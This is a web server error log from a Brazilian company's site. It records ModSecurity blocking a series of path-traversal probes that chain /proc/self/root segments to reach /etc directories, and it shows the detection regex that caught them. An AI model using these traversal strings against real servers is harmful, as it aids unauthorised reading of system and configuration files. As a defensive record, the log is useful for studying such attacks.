[Fri Mar 20 12:36:43.282595 2026] [:error] [pid 10189:tid 140411565680384] [client 74.7.241.31:53258] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pijJ3M9BSuKP7CAZmBAAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:36:43.789988 2026] [mime_magic:error] [pid 11167:tid 140411641214720] (70014)End of file found: [client 57.141.18.88:34788] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:36:45.237038 2026] [:error] [pid 7893:tid 140411616036608] [client 74.7.241.31:53274] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pjRCii7xarUs8iHamhgAAAg8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:36:46.553792 2026] [mime_magic:error] [pid 7235:tid 140411708356352] (70014)End of file found: [client 216.73.216.191:34998] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:36:46.631208 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.241.31:53282] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pjta6ubjKNq_cu4YZTQAAA08"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:36:47.935644 2026] [:error] [pid 11167:tid 140411649607424] [client 74.7.241.31:33664] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pj_HIg5MgXLBnicMvpwAAAcs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:36:50.401254 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.241.31:33668] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pkvqxLDW4GITHUkQnXQAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:36:53.987248 2026] [:error] [pid 10189:tid 140411716749056] [client 74.7.241.31:33670] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1plTJ3M9BSuKP7CAZmEgAAAIM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:36:55.211501 2026] [:error] [pid 9818:tid 140411599251200] [client 74.7.243.128:41270] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pl11pVZ5mVmJwsFNp1QAAAFE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:36:56.532323 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.243.128:40830] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pmOoXxyEfFpUF8f-7FQAAAUQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:36:57.415140 2026] [:error] [pid 10189:tid 140411599251200] [client 74.7.241.31:33674] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pmTJ3M9BSuKP7CAZmGQAAAJE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:37:00.567900 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.243.128:40846] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pnNa6ubjKNq_cu4YZYQAAA1M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:37:02.198270 2026] [mime_magic:error] [pid 26799:tid 140411565680384] (70014)End of file found: [client 216.73.216.191:36124] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 12:37:02.919117 2026] [:error] [pid 11642:tid 140411590858496] [client 74.7.243.128:59944] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pnrninkcc-iUj5AqWcgAAA5I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:37:05.293354 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.241.31:48846] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1poNa6ubjKNq_cu4YZZwAAA1E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:37:05.330181 2026] [:error] [pid 10189:tid 140411548894976] [client 74.7.243.128:59950] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1poDJ3M9BSuKP7CAZmIQAAAJc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:37:08.136143 2026] [:error] [pid 10189:tid 140411641214720] [client 74.7.243.128:59950] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pozJ3M9BSuKP7CAZmMAAAAIw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:37:08.140372 2026] [:error] [pid 10189:tid 140411725141760] [client 74.7.241.31:48858] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pozJ3M9BSuKP7CAZmLgAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:37:10.347529 2026] [:error] [pid 7893:tid 140411624429312] [client 74.7.241.31:46824] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pphCii7xarUs8iHampQAAAg4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:37:10.675914 2026] [:error] [pid 7893:tid 140411582465792] [client 74.7.241.31:46824] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pphCii7xarUs8iHampgAAAhM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:37:13.270323 2026] [:error] [pid 10189:tid 140411741927168] [client 74.7.241.31:46826] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pqDJ3M9BSuKP7CAZmMwAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:37:15.587276 2026] [:error] [pid 10189:tid 140411624429312] [client 74.7.241.31:46836] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pqzJ3M9BSuKP7CAZmPQAAAI4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:37:15.844483 2026] [:error] [pid 10189:tid 140411565680384] [client 74.7.241.31:46836] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1pqzJ3M9BSuKP7CAZmPgAAAJU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 12:37:17.505948 2026] [:error] [pid 7235:tid 140411599251200] [client 74.7.243.128:38000] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1prfqxLDW4GITHUkQnjgAAARE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
